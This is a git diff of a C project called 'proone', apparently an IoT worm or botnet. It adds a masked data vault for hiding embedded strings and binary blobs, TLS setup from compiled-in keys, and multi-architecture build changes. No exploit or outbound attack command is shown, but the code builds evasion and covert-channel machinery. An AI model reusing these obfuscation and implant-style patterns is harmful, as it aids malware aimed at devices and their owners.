11 files changed, 146 insertions, 68 deletions

diff --git a/src/Makefile.am b/src/Makefile.am
index c35dcc2..bd851c6 100644
--- a/src/Makefile.am
+++ b/src/Makefile.am
@@ -22,30 +22,30 @@ libproone_a_SOURCES =\
 	rnd.c
 
 proone_LDFLAGS = -static
-proone_LDADD = libproone.a $(DEP_PKGCFG_LIBS) $(LIBS) -lrt -lpthread
+proone_LDADD = libproone.a $(LIBS) $(DEP_PKGCFG_LIBS) -lrt -lpthread
 proone_SOURCES =\
 	worker.c\
 	heartbeat-worker.c\
 	proone.c
 
 proone_pack_LDADD = libproone.a
-proone_pack_LDFLAGS = $(DEP_PKGCFG_LIBS) $(LIBS)
+proone_pack_LDFLAGS = $(LIBS) $(DEP_PKGCFG_LIBS)
 proone_pack_SOURCES = proone-pack.c
 
 proone_unpack_LDADD = libproone.a
-proone_unpack_LDFLAGS = $(DEP_PKGCFG_LIBS) $(LIBS)
+proone_unpack_LDFLAGS = $(LIBS) $(DEP_PKGCFG_LIBS)
 proone_unpack_SOURCES = proone-unpack.c
 
 proone_list_arch_LDADD = libproone.a
-proone_list_arch_LDFLAGS = $(DEP_PKGCFG_LIBS) $(LIBS)
+proone_list_arch_LDFLAGS = $(LIBS) $(DEP_PKGCFG_LIBS)
 proone_list_arch_SOURCES = proone-list-arch.c
 
 proone_mask_LDADD = libproone.a
-proone_mask_LDFLAGS = $(DEP_PKGCFG_LIBS) $(LIBS)
+proone_mask_LDFLAGS = $(LIBS) $(DEP_PKGCFG_LIBS)
 proone_mask_SOURCES = proone-mask.c
 
 proone_print_all_data_LDADD = libproone.a
-proone_print_all_data_LDFLAGS = $(DEP_PKGCFG_LIBS) $(LIBS)
+proone_print_all_data_LDFLAGS = $(LIBS) $(DEP_PKGCFG_LIBS)
 proone_print_all_data_SOURCES = proone-print-all-data.c
 
 if TESTS
diff --git a/src/config.c b/src/config.c
index 3ae82f4..9e16198 100644
--- a/src/config.c
+++ b/src/config.c
@@ -8,7 +8,7 @@ const prne_arch_t prne_host_arch =
 	#elif defined(__ARM_ARCH_7A__)
 		PRNE_ARCH_ARMV7
 	#elif defined(__x86_64__) || defined(__i386__)
-		PRNE_ARCH_I586
+		PRNE_ARCH_I686
 	#elif defined(__m68k__)
 		PRNE_ARCH_M68K
 	#elif defined(__mips__)
diff --git a/src/data.c b/src/data.c
index 778db64..582f06d 100644
--- a/src/data.c
+++ b/src/data.c
@@ -1,6 +1,7 @@
 #include "data.h"
 #include "config.h"
 
+
 uint8_t *PRNE_DATA_DICT[NB_PRNE_DATA_KEY] = {
     // PRNE_DATA_KEY_PROC_LIM_SHM: "/31e4f17c-db76-4332-af48-fd9fb8453f8f"
     (uint8_t*)"\x00\x7F\x00\x25\x09\x24\x82\xC5\x8F\x65\xF8\x96\x35\x02\xF5\xAD\xC9\xF4\x83\x60\xD2\x33\x21\xB1\x3F\xCB\x8C\x8E\x4E\xF8\x18\xBE\x06\x33\xC5\xC4\x43\x7D\x2C\xA3\x7B",
diff --git a/src/dvault.c b/src/dvault.c
index 7a0852e..760adfe 100644
--- a/src/dvault.c
+++ b/src/dvault.c
@@ -39,6 +39,7 @@ const uint8_t PRNE_DVAULT_MASK[] = {
 
 static uint8_t *unmasked_buf = NULL;
 static size_t unmasked_buf_size = 0;
+static bool unmasked = false;
 
 
 static void invert_entry (const prne_data_key_t key, size_t *len) {
@@ -49,6 +50,7 @@ static void invert_entry (const prne_data_key_t key, size_t *len) {
     }
     memcpy(unmasked_buf, PRNE_DATA_DICT[key] + 4, entry_size);
     prne_dvault_invert_mem(entry_size, unmasked_buf, prne_dvault_get_entry_salt(key));
+    unmasked = true;
 }
 
 static void entry_check (const prne_data_key_t key, const prne_data_type_t type) {
@@ -63,6 +65,7 @@ static void entry_check (const prne_data_key_t key, const prne_data_type_t type)
 const char *prne_data_type2str (const prne_data_type_t t) {
     switch (t) {
     case PRNE_DATA_TYPE_CSTR: return "cstr";
+    case PRNE_DATA_TYPE_BIN: return "bin";
     }
     return NULL;
 }
@@ -71,6 +74,10 @@ prne_data_type_t prne_str2data_type (const char *str) {
     if (strcmp(str, prne_data_type2str(PRNE_DATA_TYPE_CSTR)) == 0) {
         return PRNE_DATA_TYPE_CSTR;
     }
+    if (strcmp(str, prne_data_type2str(PRNE_DATA_TYPE_BIN)) == 0) {
+        return PRNE_DATA_TYPE_BIN;
+    }
+    
     return PRNE_DATA_TYPE_NONE;
 }
 
@@ -157,11 +164,14 @@ void prne_init_dvault (void) {
     if (unmasked_buf == NULL) {
         abort();
     }
+    unmasked = false;
 }
 
 void prne_deinit_dvault (void) {
     prne_free(unmasked_buf);
     unmasked_buf = NULL;
+    unmasked_buf_size = 0;
+    unmasked = false;
 }
 
 prne_data_type_t prne_dvault_get_entry_data_type (const prne_data_key_t key) {
@@ -183,6 +193,16 @@ char *prne_dvault_unmask_entry_cstr (const prne_data_key_t key, size_t *len) {
     return (char*)unmasked_buf;
 }
 
+void prne_dvault_unmask_entry_bin (const prne_data_key_t key, const uint8_t **data, size_t *len) {
+    prne_dvault_reset_dict();
+    entry_check(key, PRNE_DATA_TYPE_BIN);
+    invert_entry(key, len);
+    *data = unmasked_buf;
+}
+
 void prne_dvault_reset_dict (void) {
-    memset(unmasked_buf, 0, unmasked_buf_size);
+    if (unmasked) {
+        memset(unmasked_buf, 0, unmasked_buf_size);
+        unmasked = false;
+    }
 }
diff --git a/src/dvault.h b/src/dvault.h
index a548974..d99a660 100644
--- a/src/dvault.h
+++ b/src/dvault.h
@@ -11,7 +11,10 @@ typedef struct prne_dvault_mask_result prne_dvault_mask_result_t;
 
 typedef enum {
     PRNE_DATA_TYPE_NONE = -1,
+
     PRNE_DATA_TYPE_CSTR,
+    PRNE_DATA_TYPE_BIN,
+    
     NB_PRNE_DATA_TYPE
 } prne_data_type_t;
 PRNE_LIMIT_ENUM(prne_data_type_t, NB_PRNE_DATA_TYPE, 0xFF);
@@ -46,4 +49,5 @@ prne_data_type_t prne_dvault_get_entry_data_type (const prne_data_key_t key);
 size_t prne_dvault_get_entry_size (const prne_data_key_t key);
 uint8_t prne_dvault_get_entry_salt (const prne_data_key_t key);
 char *prne_dvault_unmask_entry_cstr (const prne_data_key_t key, size_t *len);
+void prne_dvault_unmask_entry_bin (const prne_data_key_t key, const uint8_t **data, size_t *len);
 void prne_dvault_reset_dict (void);
diff --git a/src/proone-mask.c b/src/proone-mask.c
index 9349a0f..1cfabde 100644
--- a/src/proone-mask.c
+++ b/src/proone-mask.c
@@ -5,18 +5,16 @@
 
 #include <unistd.h>
 #include <fcntl.h>
+#include <sys/random.h>
 
 #include "dvault.h"
 
 
-static const char *RND_DEV_PATH = "/dev/random";
-
 int main (const int argc, const char **args) {
     int exit_code = 0;
-    int rnd_fd = -1;
     ssize_t fd_read_size;
-    uint8_t salt;
     size_t read_size = 0;
+    uint8_t salt;
     prne_dvault_mask_result_t mask_result;
     prne_data_type_t type;
 
@@ -25,37 +23,15 @@ int main (const int argc, const char **args) {
     if (argc <= 1) {
         fprintf(stderr,
             "Usage: %s <type>\n"
-            "<type>: 'cstr'\n"
-            "\n"
-            "using random device: %s\n",
-            args[0], RND_DEV_PATH);
+            "<type>: 'cstr', 'bin'\n",
+            args[0]);
         exit_code = 2;
         goto END;
     }
 
-    rnd_fd = open(RND_DEV_PATH, O_RDONLY);
-    if (rnd_fd < 0) {
-        perror("Error opening random device");
-        exit_code = 1;
-        goto END;
-    }
-
-    fd_read_size = read(rnd_fd, &salt, 1);
-    if (fd_read_size < 0) {
-        perror("Error reading random device");
-        exit_code = 1;
-        goto END;
-    }
-    if (fd_read_size == 0) {
-        fprintf(stderr, "Nothing read from random device. Low entropy?\n");
-        exit_code = 1;
-        goto END;
-    }
-    close(rnd_fd);
-    rnd_fd = -1;
-
     type = prne_str2data_type(args[1]);
     switch (type) {
+    case PRNE_DATA_TYPE_BIN:
     case PRNE_DATA_TYPE_CSTR: {
         static const size_t buf_size = 0x0000FFFF + 1;
         uint8_t buf[buf_size];
@@ -83,9 +59,11 @@ int main (const int argc, const char **args) {
             goto END;
         }
 
+        getrandom(&salt, sizeof(uint8_t), 0);
+
         mask_result = prne_dvault_mask(type, salt, read_size, buf);
         if (mask_result.result == PRNE_DVAULT_MASK_OK) {
-            printf("(uint8_t*)\"%s\"\n", mask_result.str);
+            printf("(uint8_t*)\"%s\",\n", mask_result.str);
         }
         else {
             fprintf(stderr, "Error: prne_dvault_mask() returned %d\n", (int)mask_result.result);
@@ -101,7 +79,6 @@ int main (const int argc, const char **args) {
     }    
 
 END:
-    close(rnd_fd);
     prne_free_dvault_mask_result(&mask_result);
 
     return exit_code;
diff --git a/src/proone-print-all-data.c b/src/proone-print-all-data.c
index cdb19ba..d5acf0f 100644
--- a/src/proone-print-all-data.c
+++ b/src/proone-print-all-data.c
@@ -3,6 +3,8 @@
 
 #include "dvault.h"
 
+#define TYPE_STR_PADDING "4"
+
 
 int main (void) {
 	prne_data_key_t i = PRNE_DATA_KEY_NONE + 1;
@@ -13,14 +15,28 @@ int main (void) {
 	for (i = PRNE_DATA_KEY_NONE + 1; i < NB_PRNE_DATA_KEY; i += 1) {
 		type = (prne_data_type_t)PRNE_DATA_DICT[i][0];
 
+		printf("%10lld(%" TYPE_STR_PADDING "s): ", (long long)i, prne_data_type2str(type));
 		switch (type) {
 		case PRNE_DATA_TYPE_CSTR:
-			printf("%10lld: %s\n", (long long)i, prne_dvault_unmask_entry_cstr(i, NULL));
+			printf("%s", prne_dvault_unmask_entry_cstr(i, NULL));
 			break;
+		case PRNE_DATA_TYPE_BIN: {
+			const uint8_t *p;
+			size_t size, it;
+
+			prne_dvault_unmask_entry_bin(i, &p, &size);
+
+			for (it = 0; it < size; it += 1) {
+				printf("%02X ", p[it]);
+			}
+			break;	
+		}
 		default:
-			fprintf(stderr, "Error: unhandled data type (%d)'%s'\n", (int)type, prne_data_type2str(type));
+			fprintf(stderr, "Error: unknown data type (%d)'%s'\n", (int)type, prne_data_type2str(type));
 			abort();
 		}
+
+		printf("\n");
 	}
 
 	prne_deinit_dvault();
diff --git a/src/proone.c b/src/proone.c
index 8dfabc3..c5354ff 100644
--- a/src/proone.c
+++ b/src/proone.c
@@ -10,7 +10,6 @@
 #include <errno.h>
 #include <fcntl.h>
 #include <signal.h>
-#include <malloc.h>
 #include <sys/stat.h>
 #include <sys/ioctl.h>
 #include <sys/mman.h>
@@ -22,6 +21,7 @@
 #include "util_rt.h"
 #include "dvault.h"
 #include "heartbeat-worker.h"
+#include "proone_conf/x509.h"
 
 
 struct prne_global prne_g;
@@ -354,13 +354,7 @@ END:
 }
 
 static void set_env (void) {
-#ifdef PRNE_DEBUG
-    // print info on heap corruption as much as possible
-    mallopt(M_CHECK_ACTION, 3);
-#else
-    // silently die on heap corruption
-    mallopt(M_CHECK_ACTION, 2);
-#endif
+    // environment set up function calls in here
 }
 
 static void create_ny_bin_shm (prne_rnd_engine_t *rnd) {
@@ -464,6 +458,32 @@ static void exec_ny_bin (void) {
     }
 }
 
+static void init_ssl (void) {
+    if (mbedtls_x509_crt_parse(&prne_g.ca, (const uint8_t*)PRNE_X509_CA_CRT, sizeof(PRNE_X509_CA_CRT) - 1) != 0) {
+        return;
+    }
+
+    prne_g.s_ssl_ready =
+        mbedtls_ssl_config_defaults(&prne_g.s_ssl.conf, MBEDTLS_SSL_IS_SERVER, MBEDTLS_SSL_TRANSPORT_STREAM, MBEDTLS_SSL_PRESET_DEFAULT) == 0 &&
+        mbedtls_x509_crt_parse(&prne_g.s_ssl.crt, (const uint8_t*)PRNE_X509_S_CRT, sizeof(PRNE_X509_S_CRT) - 1) == 0 &&
+        mbedtls_pk_parse_key(&prne_g.s_ssl.pk, (const uint8_t*)PRNE_X509_S_KEY, sizeof(PRNE_X509_S_KEY) - 1, NULL, 0) == 0 &&
+        mbedtls_dhm_parse_dhm(&prne_g.s_ssl.dhm, (const uint8_t*)PRNE_X509_DH, sizeof(PRNE_X509_DH) - 1) == 0 &&
+        mbedtls_ssl_conf_own_cert(&prne_g.s_ssl.conf, &prne_g.s_ssl.crt, &prne_g.s_ssl.pk) == 0 &&
+        mbedtls_ssl_conf_dh_param_ctx(&prne_g.s_ssl.conf, &prne_g.s_ssl.dhm) == 0;
+    if (prne_g.s_ssl_ready) {
+        mbedtls_ssl_conf_ca_chain(&prne_g.s_ssl.conf, &prne_g.ca, NULL);
+    }
+
+    prne_g.c_ssl_ready =
+        mbedtls_ssl_config_defaults(&prne_g.c_ssl.conf, MBEDTLS_SSL_IS_SERVER, MBEDTLS_SSL_TRANSPORT_STREAM, MBEDTLS_SSL_PRESET_DEFAULT) == 0 &&
+        mbedtls_x509_crt_parse(&prne_g.c_ssl.crt, (const uint8_t*)PRNE_X509_C_CRT, sizeof(PRNE_X509_C_CRT) - 1) == 0 &&
+        mbedtls_pk_parse_key(&prne_g.c_ssl.pk, (const uint8_t*)PRNE_X509_C_KEY, sizeof(PRNE_X509_C_KEY) - 1, NULL, 0) == 0 &&
+        mbedtls_ssl_conf_own_cert(&prne_g.c_ssl.conf, &prne_g.c_ssl.crt, &prne_g.c_ssl.pk) == 0;
+    if (prne_g.c_ssl_ready) {
+        mbedtls_ssl_conf_ca_chain(&prne_g.c_ssl.conf, &prne_g.ca, NULL);
+    }
+}
+
 static void init_shared_global (prne_rnd_engine_t *rnd) {
     // just die on error
     const size_t str_len = 1 + 10;
@@ -501,10 +521,6 @@ int main (const int argc, char **args) {
     int exit_code = 0;
     prne_rnd_engine_t *rnd = NULL;
 
-    // inits that need no outside resources
-    set_env();
-    prne_init_dvault();
-
     prne_g.host_cred_data = NULL;
     prne_g.host_cred_size = 0;
     prne_g.ny_bin_shm_name = NULL;
@@ -519,6 +535,21 @@ int main (const int argc, char **args) {
     prne_g.bin_ready = false;
     prne_init_unpack_bin_archive_result(&prne_g.bin_pack);
     prne_init_bin_archive(&prne_g.bin_archive);
+    mbedtls_x509_crt_init(&prne_g.ca);
+    mbedtls_ssl_config_init(&prne_g.s_ssl.conf);
+    mbedtls_x509_crt_init(&prne_g.s_ssl.crt);
+    mbedtls_pk_init(&prne_g.s_ssl.pk);
+    mbedtls_dhm_init(&prne_g.s_ssl.dhm);
+    prne_g.s_ssl_ready = false;
+    mbedtls_ssl_config_init(&prne_g.c_ssl.conf);
+    mbedtls_x509_crt_init(&prne_g.c_ssl.crt);
+    mbedtls_pk_init(&prne_g.c_ssl.pk);
+    prne_g.c_ssl_ready = false;
+
+    // inits that need no outside resources
+    prne_init_dvault();
+    init_ssl();
+    set_env();
 
     /* inits that need outside resources. IN THIS ORDER! */
     if (!ensure_single_instance()) {
@@ -594,6 +625,17 @@ END:
     prne_free_bin_archive(&prne_g.bin_archive);
     prne_free_unpack_bin_archive_result(&prne_g.bin_pack);
     prne_g.bin_ready = false;
+    
+    mbedtls_ssl_config_free(&prne_g.s_ssl.conf);
+    mbedtls_x509_crt_free(&prne_g.s_ssl.crt);
+    mbedtls_pk_free(&prne_g.s_ssl.pk);
+    mbedtls_dhm_free(&prne_g.s_ssl.dhm);
+    prne_g.s_ssl_ready = false;
+    mbedtls_ssl_config_free(&prne_g.c_ssl.conf);
+    mbedtls_x509_crt_free(&prne_g.c_ssl.crt);
+    mbedtls_pk_free(&prne_g.c_ssl.pk);
+    prne_g.c_ssl_ready = false;
+    mbedtls_x509_crt_free(&prne_g.ca);
 
     prne_free(prne_g.host_cred_data);
     prne_g.host_cred_data = NULL;
diff --git a/src/proone.h b/src/proone.h
index 803af34..c5d3a60 100644
--- a/src/proone.h
+++ b/src/proone.h
@@ -7,6 +7,8 @@
 
 #include <sys/types.h>
 
+#include <mbedtls/ssl.h>
+
 
 struct prne_global {
     uint8_t *host_cred_data;
@@ -21,8 +23,24 @@ struct prne_global {
     int lock_shm_fd;
     int ny_bin_shm_fd;
     bool bin_ready;
+    bool s_ssl_ready;
+    bool c_ssl_ready;
+    
     prne_unpack_bin_archive_result_t bin_pack;
     prne_bin_archive_t bin_archive;
+
+    mbedtls_x509_crt ca;
+    struct {
+        mbedtls_ssl_config conf;
+        mbedtls_x509_crt crt;
+        mbedtls_pk_context pk;
+        mbedtls_dhm_context dhm;
+    } s_ssl;
+    struct {
+        mbedtls_ssl_config conf;
+        mbedtls_x509_crt crt;
+        mbedtls_pk_context pk;
+    } c_ssl;
 };
 
 struct prne_shared_global {
diff --git a/src/protocol.c b/src/protocol.c
index 93f5f7d..f063835 100644
--- a/src/protocol.c
+++ b/src/protocol.c
@@ -7,8 +7,8 @@ const char *prne_arch2str (const prne_arch_t x) {
         return "armv4t";
     case PRNE_ARCH_ARMV7:
         return "armv7";
-    case PRNE_ARCH_I586:
-        return "i586";
+    case PRNE_ARCH_I686:
+        return "i686";
     case PRNE_ARCH_M68K:
         return "m68k";
     case PRNE_ARCH_MIPS:
@@ -31,37 +31,37 @@ const char *prne_arch2str (const prne_arch_t x) {
 }
 
 prne_arch_t prne_str2arch (const char *str) {
-    if (strcmp(str, "armv4t") == 0) {
+    if (strcmp(str, prne_arch2str(PRNE_ARCH_ARMV4T)) == 0) {
         return PRNE_ARCH_ARMV4T;
     }
-    else if (strcmp(str, "armv7") == 0) {
+    else if (strcmp(str, prne_arch2str(PRNE_ARCH_ARMV7)) == 0) {
         return PRNE_ARCH_ARMV7;
     }
-    else if (strcmp(str, "i586") == 0) {
-        return PRNE_ARCH_I586;
+    else if (strcmp(str, prne_arch2str(PRNE_ARCH_I686)) == 0) {
+        return PRNE_ARCH_I686;
     }
-    else if (strcmp(str, "m68k") == 0) {
+    else if (strcmp(str, prne_arch2str(PRNE_ARCH_M68K)) == 0) {
         return PRNE_ARCH_M68K;
     }
-    else if (strcmp(str, "mips") == 0) {
+    else if (strcmp(str, prne_arch2str(PRNE_ARCH_MIPS)) == 0) {
         return PRNE_ARCH_MIPS;
     }
-    else if (strcmp(str, "mpsl") == 0) {
+    else if (strcmp(str, prne_arch2str(PRNE_ARCH_MPSL)) == 0) {
         return PRNE_ARCH_MPSL;
     }
-    else if (strcmp(str, "ppc") == 0) {
+    else if (strcmp(str, prne_arch2str(PRNE_ARCH_PPC)) == 0) {
         return PRNE_ARCH_PPC;
     }
-    else if (strcmp(str, "rv32") == 0) {
+    else if (strcmp(str, prne_arch2str(PRNE_ARCH_RV32)) == 0) {
         return PRNE_ARCH_RV32;
     }
-    else if (strcmp(str, "rv64") == 0) {
+    else if (strcmp(str, prne_arch2str(PRNE_ARCH_RV64)) == 0) {
         return PRNE_ARCH_RV64;
     }
-    else if (strcmp(str, "sh4") == 0) {
+    else if (strcmp(str, prne_arch2str(PRNE_ARCH_SH4)) == 0) {
         return PRNE_ARCH_SH4;
     }
-    else if (strcmp(str, "spc") == 0) {
+    else if (strcmp(str, prne_arch2str(PRNE_ARCH_SPC)) == 0) {
         return PRNE_ARCH_SPC;
     }
 
diff --git a/src/protocol.h b/src/protocol.h
index 1ab2c1a..5928d9e 100644
--- a/src/protocol.h
+++ b/src/protocol.h
@@ -9,7 +9,7 @@ typedef enum {
     
     PRNE_ARCH_ARMV4T,
     PRNE_ARCH_ARMV7,
-    PRNE_ARCH_I586,
+    PRNE_ARCH_I686,
     PRNE_ARCH_M68K,
     PRNE_ARCH_MIPS,
     PRNE_ARCH_MPSL,